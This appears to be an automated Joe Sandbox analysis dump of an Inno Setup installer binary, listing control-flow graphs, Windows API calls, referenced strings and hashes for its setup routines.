GetProcAddress 996->1008 1009 486391-48639e call 40369c 996->1009 1017 4862e7-4862f5 GetLastError call 4465cc 997->1017 1018 4862d7-4862e5 call 4465cc 997->1018 1042 486381-48638c call 446424 1008->1042 1043 486347-48637c call 4462f0 * 2 call 4465cc call 446424 1008->1043 1022 4863a0-4863c1 call 4462f0 FreeLibrary call 446424 1009->1022 1023 4863c6-4863d3 call 40369c 1009->1023 1025 4862fa-486305 call 4465cc 1017->1025 1018->1025 1022->893 1036 4863f8-486405 call 40369c 1023->1036 1037 4863d5-4863f3 call 44634c call 403750 CreateMutexA 1023->1037 1025->893 1050 48643b-486448 call 40369c 1036->1050 1051 486407-486439 call 44634c call 40358c call 403750 OemToCharBuffA call 4466a0 1036->1051 1037->893 1042->893 1043->893 1061 48644a-48647c call 44634c call 40358c call 403750 CharToOemBuffA call 4466a0 1050->1061 1062 48647e 1050->1062 1051->893 1061->893 1062->893
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000000,00000000,0048649D,?,?,?,?,00000000,00000000,00000000), ref: 00485FE8
                                                                                  • FindWindowA.USER32(00000000,00000000), ref: 00486019
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindSleepWindow
                                                                                  • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                  • API String ID: 3078808852-3310373309
                                                                                  • Opcode ID: 523dc34a1de405575185184132f8ffe91325bb165768678dede105c8d61d2a96
                                                                                  • Instruction ID: db5941cc9659be88fdddff95b7058125216fed32f6fc8188fbdb178ad092bfe8
                                                                                  • Opcode Fuzzy Hash: 523dc34a1de405575185184132f8ffe91325bb165768678dede105c8d61d2a96
                                                                                  • Instruction Fuzzy Hash: C6C191A0B0020127D754BF3E8C4661F569AAF89708B22C97FB446EB78ACD7CDD05479E

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1435 478698-4786bd GetModuleHandleA GetProcAddress 1436 478724-478729 GetSystemInfo 1435->1436 1437 4786bf-4786d5 GetNativeSystemInfo GetProcAddress 1435->1437 1439 47872e-478737 1436->1439 1438 4786d7-4786e2 GetCurrentProcess 1437->1438 1437->1439 1438->1439 1448 4786e4-4786e8 1438->1448 1440 478747-47874e 1439->1440 1441 478739-47873d 1439->1441 1442 478769-47876e 1440->1442 1444 478750-478757 1441->1444 1445 47873f-478743 1441->1445 1444->1442 1446 478745-478762 1445->1446 1447 478759-478760 1445->1447 1446->1442 1447->1442 1448->1439 1450 4786ea-4786f1 call 450780 1448->1450 1450->1439 1453 4786f3-478700 GetProcAddress 1450->1453 1453->1439 1454 478702-478719 GetModuleHandleA GetProcAddress 1453->1454 1454->1439 1455 47871b-478722 1454->1455 1455->1439
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004786A9
                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004786B6
                                                                                  • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004786C4
                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004786CC
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 004786D8
                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 004786F9
                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 0047870C
                                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00478712
                                                                                  • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00478729
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                  • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                  • API String ID: 2230631259-2623177817
                                                                                  • Opcode ID: 653340a0a06b9c47bf9340bc6af6772b78d4e8f89fc7f5bd0575f6447ed4a054
                                                                                  • Instruction ID: 1872acbf4fc6bc8023c5d13a0852905d7daead313021572496985b9040ee77e8
                                                                                  • Opcode Fuzzy Hash: 653340a0a06b9c47bf9340bc6af6772b78d4e8f89fc7f5bd0575f6447ed4a054
                                                                                  • Instruction Fuzzy Hash: 7011E279685305D4DB1873755E4EBEB26888B00798F38883F688E652C3DE7C884483BF

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1456 4629bc-4629f4 call 471e10 1459 462bd6-462bf0 call 403438 1456->1459 1460 4629fa-462a0a call 46eee4 1456->1460 1465 462a0f-462a54 call 407878 call 403750 call 42dbbc 1460->1465 1471 462a59-462a5b 1465->1471 1472 462a61-462a76 1471->1472 1473 462bcc-462bd0 1471->1473 1474 462a8b-462a92 1472->1474 1475 462a78-462a86 call 42daec 1472->1475 1473->1459 1473->1465 1477 462a94-462ab6 call 42daec call 42db04 1474->1477 1478 462abf-462ac6 1474->1478 1475->1474 1477->1478 1497 462ab8 1477->1497 1480 462b1f-462b26 1478->1480 1481 462ac8-462aed call 42daec * 2 1478->1481 1483 462b6c-462b73 1480->1483 1484 462b28-462b3a call 42daec 1480->1484 1501 462aef-462af8 call 46f95c 1481->1501 1502 462afd-462b0f call 42daec 1481->1502 1487 462b75-462ba9 call 42daec * 3 1483->1487 1488 462bae-462bc4 RegCloseKey 1483->1488 1498 462b3c-462b45 call 46f95c 1484->1498 1499 462b4a-462b5c call 42daec 1484->1499 1487->1488 1497->1478 1498->1499 1499->1483 1509 462b5e-462b67 call 46f95c 1499->1509 1501->1502 1502->1480 1513 462b11-462b1a call 46f95c 1502->1513 1509->1483 1513->1480
                                                                                  APIs
                                                                                    • Part of subcall function 0042DBBC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004787FF,?,00000001,?,?,004787FF,?,00000001,00000000), ref: 0042DBD8
                                                                                  • RegCloseKey.ADVAPI32(?,00462BD6,?,?,00000001,00000000,00000000,00462BF1,?,00000000,00000000,?), ref: 00462BBF
                                                                                  Strings
                                                                                  • Inno Setup: Icon Group, xrefs: 00462A9A
                                                                                  • Inno Setup: Deselected Tasks, xrefs: 00462B4D
                                                                                  • Inno Setup: Deselected Components, xrefs: 00462B00
                                                                                  • Inno Setup: No Icons, xrefs: 00462AA7
                                                                                  • Inno Setup: Setup Type, xrefs: 00462ACE
                                                                                  • Inno Setup: App Path, xrefs: 00462A7E
                                                                                  • Inno Setup: User Info: Name, xrefs: 00462B7B
                                                                                  • Inno Setup: User Info: Organization, xrefs: 00462B8E
                                                                                  • Inno Setup: Selected Tasks, xrefs: 00462B2B
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00462A1B
                                                                                  • Inno Setup: Selected Components, xrefs: 00462ADE
                                                                                  • Inno Setup: User Info: Serial, xrefs: 00462BA1
                                                                                  • %s\%s_is1, xrefs: 00462A39
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                  • API String ID: 47109696-1093091907
                                                                                  • Opcode ID: 3782e7781fe8a24eb383a4a5757bcd665aab07b86a6e2da753cf1cf786305139
                                                                                  • Instruction ID: 84a070d140b7e3b2de7871099890dba6d1e0468fd61df68b02404bdcffa4a567
                                                                                  • Opcode Fuzzy Hash: 3782e7781fe8a24eb383a4a5757bcd665aab07b86a6e2da753cf1cf786305139
                                                                                  • Instruction Fuzzy Hash: C251B230A00A44ABCB11DF65DA45B9FB7F5EF48304F50847AE840A7395E7B8AF05CB59

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1770 4728a0-4728f6 call 42c374 call 4035d8 call 47251c call 450678 1779 472902-472911 call 450678 1770->1779 1780 4728f8-4728fd call 451298 1770->1780 1784 472913-472919 1779->1784 1785 47292b-472931 1779->1785 1780->1779 1786 47293b-472943 call 4034ac 1784->1786 1787 47291b-472921 1784->1787 1788 472933-472939 1785->1788 1789 472948-472970 call 42e158 * 2 1785->1789 1786->1789 1787->1785 1790 472923-472929 1787->1790 1788->1786 1788->1789 1796 472997-4729b1 GetProcAddress 1789->1796 1797 472972-472992 call 407878 call 451298 1789->1797 1790->1785 1790->1786 1799 4729b3-4729b8 call 451298 1796->1799 1800 4729bd-4729da call 403418 * 2 1796->1800 1797->1796 1799->1800
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(74590000,SHGetFolderPathA), ref: 004729A2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID: Failed to get address of SHGetFolderPathA function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                  • API String ID: 190572456-1072092678
                                                                                  • Opcode ID: dae74f5efb532ec6dca44b3c271d70280098fdc5f9a590453ce7f116e20ea1bd
                                                                                  • Instruction ID: 0f59d1a186fcce4688f1c16750ba33a983bc70eb0c29e752f6ecf665281de3c8
                                                                                  • Opcode Fuzzy Hash: dae74f5efb532ec6dca44b3c271d70280098fdc5f9a590453ce7f116e20ea1bd
                                                                                  • Instruction Fuzzy Hash: 2C316EB0E005099FCB10EB95DA82AEEB7B4EB45304F60847BE508F7351D778AE458B6C

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1808 4237ec-4237f6 1809 42391f-423923 1808->1809 1810 4237fc-42381e call 41f33c GetClassInfoA 1808->1810 1813 423820-423837 RegisterClassA 1810->1813 1814 42384f-423858 GetSystemMetrics 1810->1814 1813->1814 1817 423839-42384a call 408c40 call 403134 1813->1817 1815 42385a 1814->1815 1816 42385d-423867 GetSystemMetrics 1814->1816 1815->1816 1818 423869 1816->1818 1819 42386c-4238c8 call 403750 call 4062e4 call 403418 call 4235c4 SetWindowLongA 1816->1819 1817->1814 1818->1819 1831 4238e2-423910 GetSystemMenu DeleteMenu * 2 1819->1831 1832 4238ca-4238dd call 4240f0 SendMessageA 1819->1832 1831->1809 1833 423912-42391a DeleteMenu 1831->1833 1832->1831 1833->1809
                                                                                  APIs
                                                                                    • Part of subcall function 0041F33C: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED1C,?,00423807,00423B84,0041ED1C), ref: 0041F35A
                                                                                  • GetClassInfoA.USER32(00400000,004235F4), ref: 00423817
                                                                                  • RegisterClassA.USER32(0048D630), ref: 0042382F
                                                                                  • GetSystemMetrics.USER32(00000000), ref: 00423851
                                                                                  • GetSystemMetrics.USER32(00000001), ref: 00423860
                                                                                  • SetWindowLongA.USER32(004105C8,000000FC,00423604), ref: 004238BC
                                                                                  • SendMessageA.USER32(004105C8,00000080,00000001,00000000), ref: 004238DD
                                                                                  • GetSystemMenu.USER32(004105C8,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B84,0041ED1C), ref: 004238E8
                                                                                  • DeleteMenu.USER32(00000000,0000F030,00000000,004105C8,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B84,0041ED1C), ref: 004238F7
                                                                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,004105C8,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00423904
                                                                                  • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,004105C8,00000000,00000000,00400000,00000000,00000000,00000000), ref: 0042391A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                  • String ID:
                                                                                  • API String ID: 183575631-0
                                                                                  • Opcode ID: 64824ebda3b819a5d6f9bb9fbad96b9cbdb14886c93806a61ff8616b58f7079a
                                                                                  • Instruction ID: 4bcab59d6d51c08e382eeccabcccb8bb86dd5211e7d0da160f9d1554553b28b2
                                                                                  • Opcode Fuzzy Hash: 64824ebda3b819a5d6f9bb9fbad96b9cbdb14886c93806a61ff8616b58f7079a
                                                                                  • Instruction Fuzzy Hash: 9F3189B17402106AE710BF65DC82F6A3698AB04708F10057EFA44EF2D7DABDED40476D

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,COMMAND.COM" /C ,?,00452EE0,00452EE0,?,00452EE0,00000000,00452EC4,?,?,?,00000001), ref: 00452DBF
                                                                                    • Part of subcall function 0042D6E8: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00451B88,00000000,00451E3A,?,?,00000000,0048E628,00000004,00000000,00000000,00000000,?,0048B811), ref: 0042D6FB
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000000,00000000,00000000,?,?,00000000,00452E3C,?,?,COMMAND.COM" /C ,?), ref: 00452E01
                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000000,00000000,00000000,?,?,00000000,00452E3C,?,?,COMMAND.COM" /C ,?), ref: 00452E15
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$CreateDirectoryProcessWindows
                                                                                  • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                  • API String ID: 3825895818-615399546
                                                                                  • Opcode ID: 1c5c8542119e710b64115981882fd2f7d134b31a482a14ef6a4ddb267c715670
                                                                                  • Instruction ID: 87aed86650954f95c5a554d7ecfff15bee9edaac4f18ebf46f99383c4b06bbc7
                                                                                  • Opcode Fuzzy Hash: 1c5c8542119e710b64115981882fd2f7d134b31a482a14ef6a4ddb267c715670
                                                                                  • Instruction Fuzzy Hash: 7E517474A00308ABDB11EF91D942B9E7BB8EF46705F50443BFC04B7282D7BC9A49CA58

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1899 451144-451195 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 1900 451197-45119e 1899->1900 1901 4511a0-4511a2 1899->1901 1900->1901 1903 4511a4 1900->1903 1902 4511a6-4511dc call 42e158 call 42e5d8 call 403418 1901->1902 1903->1902
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004511DD,?,?,?,?,00000000,?,0048BF9B), ref: 00451164
                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045116A
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004511DD,?,?,?,?,00000000,?,0048BF9B), ref: 0045117E
                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451184
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                  • API String ID: 1646373207-2130885113
                                                                                  • Opcode ID: c6495e8f8607f6e4205b0f2ac61a97852bb030c317f23f471b1691cd27806579
                                                                                  • Instruction ID: 8ee49c41aa69a5e8d128b40f883dff4b441a250bb336c8c11432f36803ca8014
                                                                                  • Opcode Fuzzy Hash: c6495e8f8607f6e4205b0f2ac61a97852bb030c317f23f471b1691cd27806579
                                                                                  • Instruction Fuzzy Hash: E401B574600A40AFE700ABA69C02B6A3E58D746755F5009BBF900A56B3D6BC8D08C76D

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004726E7,?,?,00000000,0048E628,00000000,00000000,?,0048B996,00000000,0048BB39,?,00000000), ref: 00472607
                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,004726E7,?,?,00000000,0048E628,00000000,00000000,?,0048B996,00000000,0048BB39,?,00000000), ref: 00472610
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                  • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup
                                                                                  • API String ID: 1375471231-1421604804
                                                                                  • Opcode ID: 88506145a9022e04d4cd708b32c06c71a538998126042b398c329495b5fa2a95
                                                                                  • Instruction ID: 125c96f795c25657e1954b9605bb7fb71835f6e64b14ee5dd9163b2e47846261
                                                                                  • Opcode Fuzzy Hash: 88506145a9022e04d4cd708b32c06c71a538998126042b398c329495b5fa2a95
                                                                                  • Instruction Fuzzy Hash: 93412474A00149ABDB00EB91C991ADEB7B9EB44309F50847BF900B7391DB78AE05CB58

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • RegisterClipboardFormatA.USER32(commdlg_help), ref: 0042FDD8
                                                                                  • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0042FDE7
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0042FE01
                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 0042FE22
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                  • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                  • API String ID: 4130936913-2943970505
                                                                                  • Opcode ID: d57423373392ab5773bd7d6c0bc74bb9167f9807be5be10bf74d3029e75977cd
                                                                                  • Instruction ID: 133252ab36da858e3ffdc76840e971f61ef49694ca65f38e883fb5172bfafb07
                                                                                  • Opcode Fuzzy Hash: d57423373392ab5773bd7d6c0bc74bb9167f9807be5be10bf74d3029e75977cd
                                                                                  • Instruction Fuzzy Hash: 6DF082705483908ED300EB36990671E77E0AF44708F804A7FB898A62E2E77A9504CB2F
                                                                                  APIs
                                                                                  • LoadIconA.USER32(00400000,MAINICON), ref: 00423694
                                                                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418F5E,00000000,?,?,?,00000001), ref: 004236C1
                                                                                  • OemToCharA.USER32(?,?), ref: 004236D4
                                                                                  • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418F5E,00000000,?,?,?,00000001), ref: 00423714
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Char$FileIconLoadLowerModuleName
                                                                                  • String ID: 2$MAINICON
                                                                                  • API String ID: 3935243913-3181700818
                                                                                  • Opcode ID: 6597ce87083e9a4b03a67d8012e3db02118339f54b61f8a16c5643d292dbde92
                                                                                  • Instruction ID: d49230d3222c9ff4d584178d1f909ad97845d98b30c0afe7aa3e5234768c46b9
                                                                                  • Opcode Fuzzy Hash: 6597ce87083e9a4b03a67d8012e3db02118339f54b61f8a16c5643d292dbde92
                                                                                  • Instruction Fuzzy Hash: 6A31B1B0A042559ADB10EF29C8C57C97BE8AB04308F4041BAE844DF397D7BED9888B59
                                                                                  APIs
                                                                                  • GetCurrentProcessId.KERNEL32(00000000), ref: 00418EB5
                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 00418ED6
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00418EF1
                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F12
                                                                                    • Part of subcall function 00423040: 73A1A570.USER32(00000000,?,?,00000000,?,00418F4B,00000000,?,?,?,00000001), ref: 00423096
                                                                                    • Part of subcall function 00423040: EnumFontsA.GDI32(00000000,00000000,00422FE0,004105C8,00000000,?,?,00000000,?,00418F4B,00000000,?,?,?,00000001), ref: 004230A9
                                                                                    • Part of subcall function 00423040: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00422FE0,004105C8,00000000,?,?,00000000,?,00418F4B,00000000), ref: 004230B1
                                                                                    • Part of subcall function 00423040: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00422FE0,004105C8,00000000,?,?,00000000,?,00418F4B,00000000), ref: 004230BC
                                                                                    • Part of subcall function 00423604: LoadIconA.USER32(00400000,MAINICON), ref: 00423694
                                                                                    • Part of subcall function 00423604: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418F5E,00000000,?,?,?,00000001), ref: 004236C1
                                                                                    • Part of subcall function 00423604: OemToCharA.USER32(?,?), ref: 004236D4
                                                                                    • Part of subcall function 00423604: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418F5E,00000000,?,?,?,00000001), ref: 00423714
                                                                                    • Part of subcall function 0041F090: GetVersion.KERNEL32(?,00418F68,00000000,?,?,?,00000001), ref: 0041F09E
                                                                                    • Part of subcall function 0041F090: SetErrorMode.KERNEL32(00008000,?,00418F68,00000000,?,?,?,00000001), ref: 0041F0BA
                                                                                    • Part of subcall function 0041F090: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418F68,00000000,?,?,?,00000001), ref: 0041F0C6
                                                                                    • Part of subcall function 0041F090: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418F68,00000000,?,?,?,00000001), ref: 0041F0D4
                                                                                    • Part of subcall function 0041F090: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F104
                                                                                    • Part of subcall function 0041F090: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F12D
                                                                                    • Part of subcall function 0041F090: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F142
                                                                                    • Part of subcall function 0041F090: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F157
                                                                                    • Part of subcall function 0041F090: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F16C
                                                                                    • Part of subcall function 0041F090: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F181
                                                                                    • Part of subcall function 0041F090: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F196
                                                                                    • Part of subcall function 0041F090: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F1AB
                                                                                    • Part of subcall function 0041F090: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F1C0
                                                                                    • Part of subcall function 0041F090: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F1D5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
